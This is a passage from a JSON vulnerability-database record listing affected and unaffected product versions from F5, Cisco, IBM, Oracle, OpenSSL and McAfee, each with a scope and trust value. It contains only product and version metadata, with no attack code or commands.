"f5", "version": "11.4.1" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.20" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip asm hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "big-ip gtm hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "big-ip pem hf9", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip aam hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip gtm hf6", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.2" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.2" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.0.1.3" }, { "model": "big-ip webaccelerator hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "anyconnect secure mobility client for mac os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.0.7" }, { "model": "common services platform collector", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.11" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.3" }, { "model": "big-ip afm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "partner support service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1.1" }, { "model": "big-ip afm hf11", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.9" }, { "model": "project openssl 1.0.1i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip pem hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "cloud web security", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration assurance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "jabber for iphone and ipad", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0" }, { "model": "email gateway 7.6.2h968406", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip link controller hf9", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "telepresence mx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "big-ip ltm hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "big-ip link controller hf6", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.8" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "project openssl 1.0.1s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "webex meetings client on-premises", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "unified intelligence center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6(1)" }, { "model": "services provisioning platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs b-series blade servers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.1.3" }, { "model": "nac appliance clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.0.0" }, { "model": "big-ip link controller hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "big-ip afm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1" }, { "model": "big-ip link controller hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa next-generation firewall services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.2" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.405" }, { "model": "big-ip gtm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "big-ip afm build 685-hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip gtm hf6", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "api gateway", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.2.4.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "big-iq device hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.4" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "big-ip apm hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.7" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "services provisioning platform sfp1.1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.8" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.5" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.5" }, { "model": "big-ip link controller hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "video surveillance series high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.2" }, { "model": "jabber for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "big-ip aam hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3.4" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30002.9" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.1.0" }, { "model": "big-ip dns build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.01.14.628" }, { "model": "big-ip link controller hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.20" }, { "model": "big-ip afm build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.110.104.180" }, { "model": "project openssl 1.0.1r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip pem hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3.8" }, { "model": "big-ip dns", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "big-ip edge gateway 10.2.3-hf1", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.10" }, { "model": "big-ip ltm hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip link controller hf6", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "stealthwatch identity", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.2" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.1.0" }, { "model": "big-ip aam hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "application policy infrastructure controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2(1)" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.4" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "big-ip afm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.1.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip aam hf6", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "unified workforce optimization quality management solution 11.5 su1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system ex series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.2" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "big-ip link controller hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "universal small cell iuh", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for images build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "big-ip afm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0.0" }, { "model": "big-ip pem hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.1" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "jabber client framework components", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip aam build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.66.204.442" }, { "model": "big-ip ltm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "webex meetings client on-premises t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "dcm series d9900 digital content manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0.0" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip websafe hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "big-ip afm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70006.2.19" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.3" }, { "model": "big-ip link controller hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip gtm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "big-ip gtm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "project openssl 1.0.2i", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.14" }, { "model": "big-ip gtm build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.110.104.180" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1" }, { "model": "big-ip aam hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0.0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.4" }, { "model": "bigfix remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.4" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "big-ip gtm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "prime network services controller 1.01u", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "big-ip aam hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.12" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip analytics hf6", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.9.15.9.8" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip apm hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.0.10" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "big-ip link controller hf11", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "telepresence system tx1310", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches 5.2 sv3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1000v" }, { "model": "big-ip aam hf6", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.3" }, { "model": "telepresence server on multiparty media and", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3103204.4" }, { "model": "big-ip link controller hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.08" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.10" }, { "model": "project openssl 1.0.2h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "anyconnect secure mobility client for linux", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.1" }, { "model": "telepresence system ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip ltm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "webex business suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "big-ip aam hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.5(3)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.18" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "anyconnect secure mobility client for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.19" }, { "model": "nexus series blade switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8204.4" }, { "model": "big-iq device", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "big-ip pem hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.0.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-376.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "jabber for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "telepresence profile series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "big-ip analytics hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1.0.0" }, { "model": "big-ip analytics hf6", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.10" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "ace30 application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip analytics hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.0.28" }, { "model": "edge digital media player 1.6rb5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.12" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69450" }, { "model": "big-ip gtm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip afm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.0.0" }, { "model": "telepresence isdn gateway mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.6.1.0" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "wireless lan controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.4" }, { "model": "uc integration for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4.5.0" }, { "model": "rational application developer for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "big-ip websafe", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.404" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "unified contact center enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "telepresence system tx1310", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.151.05" }, { "model": "spa112 2-port phone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "big-ip gtm hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.33" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip ltm hf9", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "telepresence mx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1.1" }, { "model": "ip interoperability and collaboration system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0(1)" }, { "model": "big-ip afm hf9", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "spa122 analog telephone adapter with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip link controller hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "big-ip aam hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip link controller hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip apm hf9", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50003.4.2.0" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.1" }, { "model": "big-ip asm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.2" }, { "model": "uc integration for microsoft lync", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "connected grid 